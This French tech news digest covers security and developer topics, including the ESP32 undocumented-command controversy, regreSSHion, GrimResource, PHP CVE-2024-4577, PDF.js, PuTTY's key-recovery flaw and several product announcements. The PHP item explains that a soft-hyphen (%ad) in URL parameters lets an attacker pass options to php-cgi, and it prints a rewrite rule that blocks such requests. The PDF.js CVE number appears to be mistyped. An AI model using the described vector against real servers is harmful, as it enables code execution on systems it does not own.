Mise à jour : Espressif a répondu le 10 mars en publiant un poste sur les supposées portes dérobées. "Récemment, certains médias ont fait état d'un communiqué de presse qui accusait initialement les puces ESP32 d'avoir une « porte dérobée ». Il convient de noter que le communiqué de presse original de l'équipe de recherche de Tarlogic a été corrigé pour supprimer la désignation de « porte dérobée ». Cependant, toute la couverture médiatique n'a pas été modifiée pour refléter ce changement. Espressif souhaite profiter de cette occasion pour clarifier cette question pour nos utilisateurs et partenaires. Les commandes sont là pour le debug et les tests. Elles font parties de l'implémentation Host Controller Interface sur le protocole Bluetooth." En résumé : il s'agit de commandes de debug, sans accès distant, pas d'impact sur la sécurité. Ces commandes ne sont pas présentes sur les gammes 32-C, 32-S et 32-H. En complément, Espressif publie une note complète les commandes Bluetooth : https://developer.espressif.com/blog/2025/03/esp32-bluetooth-clearing-the-air/

Bleepingcomputer.com a publié un article sur des commandes non documentées sur les microcontrôleurs ESP32 fabriqués par Espressif. Pour 2023, plus d'un milliard de puces contiennent ces commandes non officielles (estimation des chercheurs). Ces commandes pourraient permettre de faire un spoofing matériel et permettre des accès non autorisés. Ces commandes ont été dévoilées durant la conférence RootedCON à Madrid. 

Pour les chercheurs, les ESP32 contiennent donc des backdoors pour permettre d'accès aux WiFi et Bluetooth. Des millions d'IoT utilisent ces composants ESP32. Ils sont peu chers et très performants. Des fonctions non documentées ne signifient pas forcément une porte dérobée intentionnelle. Il arrive souvent que des constructeurs ne documentent pas des fonctions ou des commandes pour en éviter leur usage. Les chercheurs ont démontré les vulnérabilités en codant un pilote Bluetooth spécifique pour exploiter ces commandes qui contournent les sécurités. Il permet une attaque brute sur le réseau sans fil de l'ESP. 

Les chercheurs ont mis en évidence 32 commandes qu'ils qualifient de portes dérobées. Bleepingcomputer.com s'interroge, avec raison, sur l'existence de ces commandes :

- des commandes privées qui ne sont pas destinées à être utilisées par les développeurs

- une erreur d'implémentation : ces commandes ont été laissées par erreur. Il arrive que des fondeurs laissent des fonctions non officielles, plus simple que de refaire un design.

Il est difficile de savoir pourquoi ces commandes sont présentées. Espressif a réagi le 10 mars dernier.

L'éditeur Dynatrace lance la solution Observabilty for Developers. Il s'agit d'un ensemble d'outils pour les développeurs afin de fournir un monitoring, une observabilité des environnements en production et améliorer le shift left. "Les environnements cloud modernes devenant de plus en plus complexes, les solutions d’observabilité sont devenues indispensables pour les développeurs. Avec des systèmes de plus en plus distribués et dynamiques, les équipes de développement ont besoin d’informations en temps réel sur les performances des applications, l’état de santé de l’infrastructure et les expériences utilisateurs, afin de maintenir le niveau de fiabilité tout en développant l’innovation." explique d'éditeur. 

Dynatrace rassemble dans une solution les tableaux de bord et les logs, un outil de debug temps réel (Live Debugger) pour faciliter l'analyse et la découverte des bugs. Pour nous aider, l'éditeur propose Davis AI qui sera votre Copilot pour trouver les dysfonctionnements et bugs. 

Des plugins pour Jetbrains et Visual Studio Code sont disponibles. 

BreizhCTF revient les 14 et 15 mars à Rennes. Il s'agit d'une compétition de sécurité. Plus de 600 hackers éthiques sont attendus. Le BreizhCTF rassemble aussi entreprises, startups, institutions étatiques, écoles et universités, étudiants, collégiens et lycéens pour ouvrir la porte de la cyber au plus grand nombre et susciter des vocations. L’objectif : fédérer la communauté cyber et répondre aux besoins en formation, en emploi et en compétences de la filière, faisant de cet événement un événement d’utilité publique face aux enjeux cyber.

Le format change pour la 9e édition : la compétition aura lieu en journée, le samedi. Au programme : un “Hack&Teens” pour faire découvrir la cyber aux collégiens et lycéens et un “Hack&Job” pour répondre aux besoins RH de la filière. 

Site : https://www.breizhctf.com/

GitHub annonce deux nouvelles fonctions pour les développeurs : Secret Protection et Code Security. Il s'agit d'une modification de GitHub Advanced Security. Jusqu'à présent, ces outils étaient liés à Advanced Security. A partir du 1er avril, ils seront disponibles en dehors de cette offre. 

En résumé :

• GitHub Secret Protection : les fuites de secrets constituent un défi de grande ampleur ; rien qu'en 2024, plus de 39 millions de secrets ont été détectés dans les référentiels GitHub. Secret Protection détecte et empêche les fuites de secrets avant qu'elles ne se produisent grâce à une protection push, une analyse des secrets, une détection basée sur l'IA avec un faible taux de faux positifs, des informations sur la sécurité, etc. 19 $ / mois / par committer

• GitHub Code Security : cette solution aide à identifier et à corriger plus rapidement les vulnérabilités grâce à l'analyse de code, à Copilot Autofix, aux campagnes de sécurité, à Dependency Review Action, etc. 30 $ / mois / par comitter

• disponibilité d'un outil d'évaluation des risques liés aux secrets, Security tab : outil gratuit

Stroustrup appelle la communauté C++ à défendre le langage depuis les polémiques des agences de sécurité et de la maison blanche. C++ est devenu une cible de choix de nombreux experts en sécurité et d'éditeurs : C++ n'est pas assez sécurisé, utiliser Rust ! En cause, la difficulté à bien utiliser la gestion mémoire et la notion de safe / unsafe et de la memory safe. 

Depuis, plusieurs propositions ont été lancées pour faciliter la sécurité par design dans le langage : TrapC, FilC, MiniC, Safe C++, etc. Mais le travail avancerait trop lentement pour le créateur du langage. Dans une note pour le comité de standarisation du 7 février, Bjarne appelle à agir rapidement et à mieux défendre C++. Le WG21 doit agir de manière significative. Il rappelle que le memory safe est un sujet crucial. 

Quelques jours plus tard, il évoque la réelle menace sur C++ des dernières directives des agences américaines sur l'obligation des constructeurs de proposer une approche memory safe dans les roadmaps produits. En arrière-plan, il y a aussi l'appel de Mark Russinovich (Microsoft Azure) à utiliser uniquement Rust pour les nouveaux projets. Au-delà, il y a une réelle question : une dépréciation C et C++ dès 2026 dans agences américaines. 

Bjarne supporte les safety profiles dans le langage. Ce framework devrait intégrer le standard C, C++ mais le processus d'intégration est long. Pourquoi pas assurer une intéropérabilité avec Rust le temps de simplifier le memory safe ? 

Sniffnet est un outil permettant de surveiller l'activité du trafic internet mais avant tout c'est un outil de monitoring de réseau pour comprendre et surveiller ce qu'il se passe. On peut appliquer des filtres, voir les statistiques, les logs, avoir le trafic en temps réel, exportation les données, identifier les connexions à son réseau local, etc. 

L'outil est open source, écrit en Rust et disponible sur Linux, macOS et Linux. On peut l'installer directement dans le Terminal ou pour l'installeur. L'interface est plutôt simple à prendre en main et les métriques sont bien visibles et compréhensibles. 

Site : https://sniffnet.net/

Question qui revient souvent : les apps mobiles sont-ils sécurisées ? Les équipes du zLabs de Zimperium ont publié une étude sur cette question. Malheureusement, de nombreuses apps disponibles sur l'AppStore et Play, possèdent toujours de vulnérabilités ou sont elles-mêmes de fausses apps. Le comportement de certaines apps est pointé du doigt : pourquoi une messagerie prendrait une copie d'écran sans notifier l'utilisateur ? Pour accéder au presse-papiers ? Pourquoi les OTP sont stockés alors qu'ils sont normalement à usage unique ?

Le constat est amer : le simple fait de télécharger depuis un appstore officiel, même une application très populaire, n'est pas une garantie de sécurité.

"L’analyse des 50 applications les plus téléchargées sur l’App Store d’iOS et le Play Store d’Android dans les catégories Productivité, Affaires et Finance révèle qu’au moins une application par catégorie présente un score élevé de vulnérabilité en matière de sécurité ou de confidentialité. Ces résultats mettent en évidence des failles récurrentes dans la gestion de la sécurité et de la confidentialité des applications les plus utilisées, soulignant ainsi la nécessité d'un contrôle rigoureux en entreprise." commente le rapport. 

Une application de messagerie populaire : commodité vs sécurité

L’analyse d'une application de messagerie largement utilisée a révélé d'importants problèmes de sécurité et de confidentialité. Ses demandes excessives d’autorisation, notamment l'accès à la caméra, au microphone et aux services de localisation, vont bien au-delà des besoins d'une application de messagerie. De plus, elle a un accès illimité au presse-papiers du téléphone, ce qui peut exposer des informations sensibles comme des mots de passe ou des données confidentielles copiées par l’utilisateur. Elle dispose également d'une fonctionnalité permettant d’effectuer des captures d'écran, pouvant ainsi surveiller toutes les interactions de l'utilisateur avec l’application. En matière de sécurité, l'application présente des faiblesses dans son architecture. Un attaquant pourrait exploiter ces failles pour injecter du code malveillant, transformant ainsi l’application de messagerie en un outil sophistiqué de surveillance.

"Bien que les applications iOS présentent généralement moins de vulnérabilités liées aux fuites de données que leurs équivalents Android, elles souffrent davantage de faiblesses cryptographiques. Ce constat met en évidence un compromis fondamental entre les plateformes : si iOS applique des contrôles de confidentialité plus stricts dans certains domaines, la sécurisation cryptographique reste un enjeu majeur." poursuit le rapport. 

Depuis 2 ans, les paquets Python malveillants se multiplient sur PyPi. Les hackers utilisent des noms très proches pour provoquer une confusion et l'utilisateur installe le mauvais paquet ou des paquets officiels sont purement et simplement remplacés par de faux paquets. 

Le projet Quarantine (quarantaine) doit permettre aux administrateurs PyPi d'isoler un paquet incertain ou identifié comme malveillant. L'objectif est que les administrateurs PyPi disposent de rapports d'analyse sur les paquets et, si un paquet s'avère douteux, ils peuvent isoler le ou les paquets et toutes leurs versions liées. La suppression complète des paquets sera possible ainsi que le bannissement du nom du paquet. Les auteurs de Quarantine sont conscients que la suppression totale d'un paquet peut gêner les développeurs et les utilisateurs. Les créateurs des paquets seront prévenus et la procédure d'exclusion lancée.

Plus un paquet malveillant reste disponible longtemps, plus il risque de se propager. Depuis que le projet est déployé, plus de 140 paquets ont été identifiés et isolés. Un projet a été réintégré, tous les autres ont été supprimés de PyPi.

Pour en savoir plus : https://blog.pypi.org/posts/2024-12-30-quarantine/

Par Jason Merrick, SVP des produits chez Tenable

Avec l'adoption croissante du cloud par les entreprises, la sécurité de celui-ci est devenue une priorité absolue. Toutefois, entre les environnements multi-cloud, les configurations complexes, les cycles de développement rapides et la méconnaissance, voire le désintérêt, des développeurs pour la cybersécurité, la protection des infrastructures cloud est un véritable parcours du combattant. C’est là que les Cloud-Native Application Protection Platform (CNAPP) apportent une réponse globale, en facilitant une sécurité de bout en bout, du développement à la production. Elles permettent aux développeurs de travailler librement tout en assurant aux administrateurs une tranquillité d'esprit. Pour être efficaces, elles doivent cependant répondre à des critères clés et suivre les meilleures pratiques permettant de sécuriser chaque étape du cycle de vie des applications.

Légende : Intégration d’une CNAP avec AWS

Une visibilité complète grâce à une intégration profonde

Une CNAPP efficace commence par établir une connexion directe avec les API des principaux fournisseurs cloud comme Azure, AWS, GCP et OCI. Cette intégration permet une visibilité complète sur toutes les ressources cloud, y compris les workloads, les identités, les configurations réseau et les données. Grâce à cette vue d’ensemble, les organisations peuvent identifier rapidement des configurations inadéquates, des autorisations excessives et d’autres vulnérabilités qui pourraient compromettre leur environnement. Par exemple, pour AWS, il est possible de choisir entre deux modes de connexion : en "frictionless" via AWS Systems Manager Inventory et AWS Systems Manager Agent (SSM Agent), ou en utilisant le cloud connector d’AWS.

Une gestion proactive des risques via le CSPM

Une fois l’infrastructure connectée, la plateforme CNAPP repose sur deux piliers essentiels pour la gestion des risques cloud. Premièrement, le Cloud Security Posture Management (CSPM) scanne en permanence les configurations pour identifier les violations de conformité avec des standards comme le RGPD, ISO 27001 ou les benchmarks CIS. Cela garantit que les environnements respectent les meilleures pratiques en matière de sécurité. La plateforme s’interconnecte en mode sans agents avec les fichiers de configuration des infrastructures en production pour les comparer à ses bases de données de vulnérabilités et de bonnes pratiques.Le Cloud Infrastructure Entitlement Management (CIEM) analyse les permissions des identités (humaines ou machines) pour réduire les risques liés à des autorisations excessives ou inutilisées. Il permet d’appliquer des politiques d’approvisionnement "juste-à-temps" et de moindre privilège, limitant ainsi les possibilités d'accès non autorisés. L’objectif du CIEM est de minimiser les risques sans compromettre la productivité des utilisateurs.

Uniformisation au service d’une CNAPP et d’un CSPM plus intelligents

Le défi principal dans la sécurisation de l'Infrastructure as Code (IaC) réside dans le manque de standardisation des définitions d'infrastructure. Par exemple, le YAML de Kubernetes est différent du HashiCorp Configuration Language (HCL) utilisé pour Terraform. Ce manque d'uniformité complique l'évaluation et la réduction des risques. La seule manière évolutive d'obtenir de la cohérence est de normaliser les types d'IaC dans un format uniforme (Cloud as Code).Une fois les définitions d'infrastructure normalisées, des vérifications basées sur des politiques (Policy as Code) peuvent être appliquées pour identifier les violations de bonnes pratiques en matière de conformité ou de sécurité. Les solutions CSPM doivent examiner le code tout au long de son développement, sans entraver le flux de travail et l'agilité des développeurs. Open Policy Agent (OPA) est désormais le standard pour l'application des politiques. Les moteurs de politiques basés sur Python, par exemple, sont peu maniables par rapport à ceux basés sur OPA, qui utilisent le langage de requête Rego.

Une sécurité avancée pour Kubernetes

Les environnements Kubernetes, essentiels à la modernisation des infrastructures, introduisent également des défis uniques en termes de sécurité. Une CNAPP doit simplifier leur gestion grâce à une surveillance continue des ressources Kubernetes, comme les nœuds, les namespaces et les comptes de service, tout en détectant les configurations non conformes aux standards de sécurité, tels que les benchmarks CIS pour Kubernetes.

L’automatisation au service de la sécurité

Au-delà du monitoring, la force d’une CNAPP réside dans son approche automatisée de la remédiation. Lorsqu’une vulnérabilité ou une configuration incorrecte est détectée, plusieurs solutions sont possibles. Il est possible d’appliquer des correctifs automatisés intégrés dans des outils comme Terraform et CloudFormation via une intégration fluide avec des plateformes comme Jira, Slack ou ServiceNow, et des guides de correction manuelle lorsque l’automatisation n’est pas souhaitée. Cette flexibilité garantit que la sécurité ne freine pas les cycles de développement rapide.

La plupart des développeurs ne sont toutefois pas des experts en sécurité et manquent des connaissances nécessaires pour remédier aux mauvaises configurations détectées dans l'IaC. Les workflows de remédiation doivent ainsi avoir la capacité de s'intégrer à ceux des développeurs. La seule approche scalable est une solution CSPM qui génère automatiquement le code nécessaire pour résoudre les mauvaises configurations et qui crée des pull requests contre la branche principale (Remédiation en tant que Code). 

Légende : Exemple d'alerte fournie par une CNAPP concernant un conteneur vulnérable.

Assurer une remédiation plus efficace et sécuritaire en production

La plus grande distinction entre les solutions CSPM de première génération et celles de nouvelle génération réside dans leur approche de la remédiation des erreurs qui se produisent sur la production. Les solutions CSPM de première génération offraient des capacités de remédiation pour traiter un ensemble limité de risques en modifiant automatiquement les configurations en temps réel. Cette approche était toutefois risquée. Elle nécessite d’abord que l'outil CSPM soit autorisé à mettre à jour les environnements en temps réel, ce qui peut être contraire à la politique de sécurité. Ensuite, autoriser un outil à apporter des modifications automatiques aux configurations de l'infrastructure en temps réel introduit le risque d'un éventuel temps d'arrêt. Et plus important encore, toute modification apportée aux configurations d'infrastructure en temps réel crée une dérive par rapport à la base de référence de l'IaC. Cela signifie que si l'infrastructure est redéployée à partir de l'IaC, le changement effectué en temps réel sera perdu.

Les solutions CNAPP de nouvelle génération établissent quant à elle l'IaC comme la seule source de vérité. Par exemple, quand un ingénieur augmente la configuration de la mémoire d'une instance de calcul en temps réel pour améliorer les performances d'une application, le changement de configuration n'introduit pas de risque, mais l'IaC correspondant doit être mis à jour pour refléter ce changement. Cela permet d’établir une nouvelle base de référence.En cas de configuration risquée, comme la création accidentelle d'une règle dans une table de routage exposant un sous-réseau privé à Internet, la plateforme génère automatiquement le code nécessaire pour corriger la configuration. Les opérations peuvent ensuite redéployer l'infrastructure en utilisant le code mis à jour et éliminer les risques.En réunissant des outils de gestion des risques, de remédiation et de conformité dans une seule plateforme, la CNAPP réduit la complexité des environnements multi-cloud. Elle permet aux développeurs d’innover rapidement tout en assurant aux équipes SecOps un contrôle continu sur la sécurité des environnements cloud.

Légende : Des outils open-source gratuits comme Terrascan offrent aux développeurs un moyen simple de se familiariser avec les tests de Policy as Code (PaC) pour l'Infrastructure as Code (IaC).

Le fournisseur Gandi propose un nouveau pack de sécurité : Pack DNS Sécurité+. Il doit protéger les infrastructures et les serveurs DNS contre les attaques et les DDoS. Gandi estime que 88 % des entreprises subissent des attaques par le DNS. En redirigeant le flux des visiteurs vers des sites frauduleux, les attaques par le DNS peuvent en effet avoir des conséquences graves : détournement de trafic, perte de clientèle, atteinte à la réputation et dommages financiers importants. Il est donc impératif de protéger les infrastructures DNS.

Les principales fonctionnalités :

• Une redondance DNS : une infrastructure résiliente en partenariat avec un leader mondial, assurant une disponibilité de 99,9 %, même en cas d'attaque DDoS ou de panne.
  
  
• Un Backup DNS illimité : permettant de revenir à une configuration antérieure en cas de problème, facilitant la gestion des zones DNS.
  
  
• Une authentification à deux facteurs (2FA) spécifique en cas de changement de configuration ou pour toutes opérations sensibles du nom de domaine (seconde authentification via un code envoyé par e-mail).
  
  
• Un certificat de propriété de domaine : un document juridique pour prouver la propriété d’un domaine, utile dans le cadre de litiges.

Gandi prévient : Le Pack DNS Sécurité+ fonctionne en redirigeant le trafic vers votre site via des Serveurs de noms spécifiques. Si vous modifiez les serveurs de noms de votre domaine, le pack DNS Sécurité+ sera désactivé.

Documentation : https://docs.gandi.net/fr/noms_domaine/services_domaines/pack_securite.html

"Cette collaboration approfondie offre aux développeurs une vue consolidée du statut du projet et de la posture de sécurité, pour aider à résoudre rapidement les vulnérabilités potentielles découvertes par les offres de sécurité avancée des deux entreprises. De plus, pour aider les développeurs à obtenir rapidement des informations sur les packages tiers, les entreprises ont annoncé une extension de chat Copilot pour sélectionner rapidement des packages logiciels qui sont mis à jour, approuvés par l'organisation et sûrs à utiliser." précise l'annonce officielle. 

JFrog s'intègre à GitHub et permettra de mieux tracer les codes tout au long du cycle de vie :

- l'intégration de Copilot permettra d'avoir des informations sur les packages

- tableau de bord pour donner une vue unifiée des analyses de GitHub Advanced Security et de JFrog Advanced Security

- navigation bidirectionnelle dans GitHub Actions et JFrog Artifactory

L'idée est d'améliorer la livraison logicielle et de fiabilité la supply chain logicielle. 

Bonne nouvelle pour les développeurs Rust qui rêvent d'utiliser OpenPGP directement dans Rust. C'est maintenant chose faite avec rPGP. Il faut utiliser minimum Rust 1.75. Le tout est en licence Apache 2 et MIT. Le projet supporte Autocrypt : https://docs.autocrypt.org/level1.html

Code source : https://github.com/rpgp/rpgp

Qu'est-ce que le Confidential Computer ? Pourquoi est-ce désormais un élément important dans la sécurité des infrastructures ?

Ijlal Loutfi, security product manager chez Canonical, nous explique tout.

Sortez le pop-corn.

Qui est donc responsable de la panne géante de nombreux terminaux et services Microsoft liée à une mise à jour de CrowdStrike ? La panne est intervenue suite à une mise à jour de l'antivirus. Puis ce fut l'effet domino avec plus de 8 millions de PC en panne !

L'outil de CrowdStrike en cause possède les droits bas niveau pour accéder au noyau du système. Le logiciel tiers joue le rôle de Windows Defender. Depuis 2009, Microsoft permet des éditeurs tiers de jouer ce rôle critique. Avec l'Europe, un accord fut trouvé pour permettre ces accès tiers et ne pas fermer strictement le noyau.

Rappelons que Microsoft n'est pas responsable de la panne car il s'agit d'un éditeur tiers qui en est la cause. Cependant, très vite, le géant fut mis en cause. Mais cela met tout de même en avant un point essentiel : une mauvaise mise à jour au niveau noyau peut faire crasher les PC !

Apple avait décidé de fermer les accès bas niveau pour des questions de sécurité. Microsoft a précisé il y a quelques jours que cette fermeture à la Apple du noyau n'était pas possible... une conséquence de l'accord avec l'Europe.

Faut-il pour autant accuser Microsoft et lui faire porter la faute de la mise à jour : CrowdStrike a certes fait un mauvais patch mais n'est-ce à Windows de contrôler et de vérifier pour éviter un blocage ?

L'accès bas niveau, avec les mêmes droits et API, a été demandé par l'Europe et c'est documenté depuis 2009 même si comme le rappelle nos confrères Next INpact, l'accès direct au noyau n'était pas demandé mais d'avoir les mêmes fonctionnalités et accès que les logiciels Microsoft.

Microsoft cherche-t-il par ce biais de dire qu'il ne peut sécuriser le noyau et l'architecture de bas niveau à cause de cet accord avec l'Europe ? L'espace noyau est un élément d'architecture sensible car cela permet d'accéder au coeur de l'OS ce qui peut être potentiellement dangereux si une extension ou un pilote est mal codé ou possède des failles.

Apple, pour des raisons de sécurité et de robustesse de l'OS, avait fini par interdire l'espace noyau (extension kernel). Les éditeurs se sont adaptés. Cela explique pourquoi les machines Apple n'ont été impactées par la panne. Sur les OS Windows et Linux, l'éditeur utilise le niveau noyau.

Plusieurs questions se posent :

• qui est finalement responsable : uniquement CrowdStrike pour la mise à jour défectueuse ?
• Microsoft est-il indirectement responsable pour ne pas fermer l'espace noyau et limiter les accès tiers comme le fait macOS ?

Cette panne pourrait avoir un bénéfice : revoir la sécurité noyau de Windows, fermer son accès tiers et imposer un accès moins critique pour éviter des kernel panics.

L'affaire ne fait que commencer.

En partenariat avec Qbyte magazine.

Les équipes de Qualys viennent de dévoiler une faille importante dans OpenSSH : regreSSHion. Elle permet un accès distant non autorisé pour exécuter du code. Cette découverte est numéoritée CVE-2024-6387. Elle concerne les serveurs OpenSSH sur les systèmes Linux utilisant glibc. "La vulnérabilité est une condition concurrente critique dans les serveurs OpenSSH permettant un accès distant non authorisé pour exécuter du code distant en qualité de root sur les systèmes Linux basés sur glibc. Cela représente une faille importante de sécurité. Cette faille affecte les serveur OpenSSH et leurs configurations par défaut." précise l'annonce. 

Qualys estime à 14 millions les serveurs concernés. Les versions d'OpenSSH touchées sont les versions antérieures à la 4.4p1 et les versions 8.5p1 et +. Les systèmes OpenBSD ne sont pas concernés. 

Pour plus de détails : https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server

Plusieurs failles ont touché GitLab ces derniers mois. La plus critique est la CVE-2024-5655 donnant la possibilité d'exécuter des pipelines dans l'environnement par un autre utilisateur que le propriétaire du pipeline. L'éditeur l'a corrigé le 26 juin dernier. Le patch critique de sécurité est numéroté 16.11.5, 17.0.3 ou 17.1.1, selon la version de GitLab utilisée. Cela concerne les éditions communautaire et entreprise. 

En tout, 14 failles sont corrigées dont 1 faille critique, 3 failles sévères, 9 failles moyennes et une peu critique. 

Pour en savoir plus : https://about.gitlab.com/releases/2024/06/26/patch-release-gitlab-17-1-1-released/

Elastic Security Labs annonce avoir découvert une nouvelle méthode pour exécuter du code non autorisé : Grimresource. Elle peut permettre d'exécuter du code dans la console Microsoft (mmc.exe) via un fichier MSC. 

Quelques détails donnés par l'équipe d'Elastic :

• Lorsqu'un fichier de console malveillant est importé, une vulnérabilité dans l'une des bibliothèques MMC peut conduire à l'exécution de code malveillant, y compris des malwares. Elastic Security Labs a déjà identifié une occurrence de cette nouvelle technique.
• Les attaquants peuvent combiner cette technique avec DotNetToJScript pour obtenir une exécution de code arbitraire, ce qui peut entraîner un accès non autorisé, une prise de contrôle du système et plus encore.

Aujourd'hui, de multiples vecteurs sont utilisés par les hackers pour exécuter du code même si Microsoft a désactivé les macros Office dans les documents provenant du Web. Une des clés de GrimResource est de s'appuyer sur le XSS présent dans la librairie apds.dll.

Pour tous les détails techniques : https://www.elastic.co/security-labs/grimresource

Une vulnérabilité critique de PHP sur Windows a été découverte  sur toutes les versions de PHP de 5.x à 8.x. Sur Windows signifie qu'un server Web IIS avec le module php-cgi est vulnérable. Mais cela signifie aussi que les utilisateurs de XAMPP sont vulnérables. De plus il est important de savoir que si cette vulnérabilité est liée à php-cgi elle peut malgré tout être exploitée en dehors su mode cgi si les exécutables php.exe ou php-cgi.exe sont accessibles au serveur web.

Cette vulnérabilité est estampillée CVE-2024-4577. Elle existe sur Windows car si le système est configuré pour utiliser certaines pages de codes, il peut utiliser le comportement « Best-Fit » pour remplacer les caractères dans la ligne de commande donnée aux fonctions de l'API Win32. Le module PHP CGI peut alors interpréter à tort ces caractères comme des options PHP, ce qui peut permettre à un utilisateur malveillant de transmettre des options au binaire PHP en cours d'exécution, et ainsi de révéler le code source des scripts, d'exécuter du code PHP arbitraire sur le serveur, etc.

Cette vulnérabilité est exploitable via la simple insertion d’un caractère « Soft Hyphen » dans les paramètres d’une URL. Ce caractère est converti automatiquement en trait d’union classique via la fonctionnalité « Best-Fit » de Windows. Ce qui permet de contourner un mécanisme de vérification de PHP, et ainsi lui faire exécuter du code via l’exécutable « php.exe ».

Une URL attaquante peut-être repérée par la présence d’un caractère « Soft-Hyphen »  dedans, caracère dont l'encodage est %ad.

Le site beaglesecurity.com précise qu'à l'heure actuelle, il a été confirmé qu'un attaquant non autorisé peut exécuter du code arbitraire sur des serveurs distants exécutant Windows dans les paramètres régionaux suivants :

• Chinois traditionnel (page de code 950)
• Chinois simplifié (page de codes 936)
• Japonais (page de code 932)

Pour Windows exécuté dans d'autres langues telles que l'anglais, le coréen et l'Europe occidentale, la diversité des scénarios d'utilisation de PHP rend difficile l'énumération et l'élimination de toutes les voies d'exploitation potentielles.

Pour se protéger de cette vulnérabilité, les administrateurs doivent mettre leur PHP à jour sur leurs systèmes. Mais s'ils ne peuvent pas le faire, par exemple en étant obligés de travailler avec un PHP 5.x qui n'est plus maintenu, beaglesecurity.com suggère une réécriture d'URL comme mesure d'atténuation :

RewriteEngine On
RewriteCond %{QUERY_STRING} ^%ad [NC]
RewriteRule .? - [F,L]

La bibliothèque PDF.js est une bibliothèque écrite en JavaScript, développée par Mozilla, qui permet de visualiser des fichiers PDF. Une faille vient d'y être découverte qui permet l'exécution de code arbitraire. Comme quoi il n'y a pas que C et C++ pour créer ce genre de souci. La vulnérabilité est estampillée CVE-2024-476 et est décrite ainsi : Une vérification de type manquait lors de la gestion des polices dans PDF.js, ce qui permettrait l'exécution arbitraire de JavaScript dans le contexte PDF.js.

La bibliothèque PDF.js est très largement utilisée. Tout d'abord elle l'est dans Firefox et Thunderbird. Ce qui veut dire qu'un utlisateur peut-être attaqué simplement en visualisant un PDF malveillant dans son navigateur ou dans Thinderbird après l'avoir reçu en fichier attaché à un mail. PDF.js se trouve aussi intégrée dans de nombreuses application Web, dans le framework Electron, dans un module Node appelé pdfjs-dist, avec environ 2,7 millions de téléchargements hebdomadaires, pour ne donner que ces exemples.

Pour se protéger de cette vulnérabilité, il faut utiliser une version de PDF.js égale ou supérieure à 4.2.67. C'est-à-dire Firefox 126 au moins et Thunderbird 115.11 au moins. Les développeurs, quant à eux, compte tenu du fait que PDF.js est très utilisée dans moult bibliothèques et frameworks, doivent être particulièrement attentifs à ne pas intégrer à leurs applications, involontairement ou indirectement, une version vulnérable de la bibliothèque.

Ce sont des chercheurs en sécurité de Codean Labs qui ont découvert cette vulnérabilité. Ils l'expliquent techniquement en détail dans un billet très intéressant.  En résumé, lorsqu'un document PDF embarque une police de caractères spéciale, PDF.js ne peut pas la rendre directement. Au lieu de cela, la bibliothèque convertit la description des caractères de la police en instructions pour les dessiner. C'est dans cette description de la police qu'un attaquant peut placer du code arbitraire et ainsi forger un document PDF malveillant.

Le billet des chercheurs de Codean Labs contient un lien vers un tel document PDF, à titre de preuve de concept.

JFrog a publié une étude révélant la découverte de trois campagnes de logiciels malveillants à grande échelle ciblant Docker Hub, qui ont mis en place des millions de conteneurs malveillants "imageless".

L'équipe de recherche en sécurité de JFrog a découvert que 4 millions de dépôts dans Docker Hub sont sans image et n'ont aucun contenu à l'exception de la documentation du dépôt. Cette documentation n'est pas liée au conteneur - il s'agit simplement d'une petite page web qui incite les utilisateurs à visiter des sites de phishing ou des sites hébergeant des logiciels malveillants. Sur les 4,79 millions de dépôts sans image publiés dans Docker Hub, 37 % sont des dépôts publics Docker Hub, et les chercheurs de JFrog ont pu relier 3,2 millions (25 %) de ces dépôts aux grandes campagnes de logiciels malveillants. 

" L'aspect le plus préoccupant de ces trois campagnes est que les utilisateurs ne peuvent pas faire grand-chose pour se protéger dès le départ, si ce n'est faire preuve de prudence ", explique Shachar Menashe, Senior Director of Security Research chez JFrog. " Nous sommes essentiellement en présence d'un terrain de jeu de logiciels malveillants qui, pour certains d’entre eux, ont été créés il y a trois ans. Ces acteurs de la menace sont très motivés et se cachent derrière la crédibilité du nom Docker Hub pour attirer les victimes. Le meilleur et le seul moyen de se protéger est de faire preuve de prudence lors de l'utilisation de dépôts publics, même lorsqu'il s'agit d'une plateforme qui n'est pas connue pour être utilisée de manière abusive. Comme le suggère la loi de Murphy, si quelque chose peut être exploité par les développeurs de logiciels malveillants, il le sera inévitablement, et nous nous attendons donc à ce que ces campagnes se retrouvent dans d'autres dépôts que celui de Docker Hub.”

Le blogpost retracant l’intégralité de la découverte est disponible ici.

En arrière-plan, PuTTY est un émulateur de terminal open source que les développeurs utilisent depuis Windows, pour accéder et gérer à distance des serveurs et d’autres périphériques en réseau via SSH. Une vulnérabilité critique vient d'être découverte dans PuTTY par Fabian Bäumer et Marcus Brinkmann, deux chercheurs de l’Université de la Ruhr à Bochum en Allemagne.

La vulnérabilité est estampillée CVE-2024-31497. Elle se situe  dans le code qui génère des signatures à partir de clés privées ECDSA qui utilisent la courbe NIST P521. (PuTTY, ou Pageant, génère une signature à partir d'une clé lorsque vous l'utilisez pour vous authentifier auprès d'un serveur SSH.) L'exploitation de cette vulnérabilité compromet les clés privées. Un attaquant en possession de quelques dizaines de messages signés et de la clé publique dispose de suffisamment d'informations pour récupérer la clé privée, puis forger des signatures comme si elles provenaient de vous, lui permettant (par exemple) de se connecter à tous les serveurs sur lesquels vous utilisez cette clé. pour. Pour obtenir ces signatures, un attaquant n'a qu'à compromettre brièvement tout serveur sur lequel vous utilisez la clé pour vous authentifier, ou à accéder momentanément à une copie de Pageant contenant la clé.

Le projet PuTTY a expliqué cette vulnérabilité en détail :

"Tous les schémas de signature DSA nécessitent qu'une valeur aléatoire soit inventée lors de la signature, connue sous le nom de « nonce » (jargon cryptographique pour une valeur utilisée une seule fois), ou parfois par la lettre k . Il est bien connu que si un attaquant peut deviner la valeur de k que vous avez utilisée ou trouver deux signatures que vous avez générées avec le même k , il peut alors immédiatement récupérer votre clé privée.

Cela signifie qu'il est dangereux de générer des signatures DSA sur des systèmes sans source aléatoire de haute qualité. Beaucoup plus dangereux que de générer les clés de chiffrement pour une seule session : une fuite de la clé privée compromet bien plus d’une session SSH.

Pour cette raison, puisque PuTTY a été développé sur Windows avant de disposer d'un générateur de nombres aléatoires cryptographiques, PuTTY a toujours généré son k en utilisant une méthode déterministe, évitant ainsi le besoin de nombres aléatoires. L'astuce consiste à calculer un hachage sécurisé dont l'entrée inclut le message à signer ainsi que la clé privée . La sortie de hachage sécurisé ne peut pas être distinguée des données aléatoires (sinon la fonction de hachage ne fait pas son travail), et cette méthode de génération ne peut pas être répétée par un attaquant qui tente de découvrir la clé privée – s'il pouvait générer le même hachage. saisissez comme vous, ils auraient déjà la clé privée.

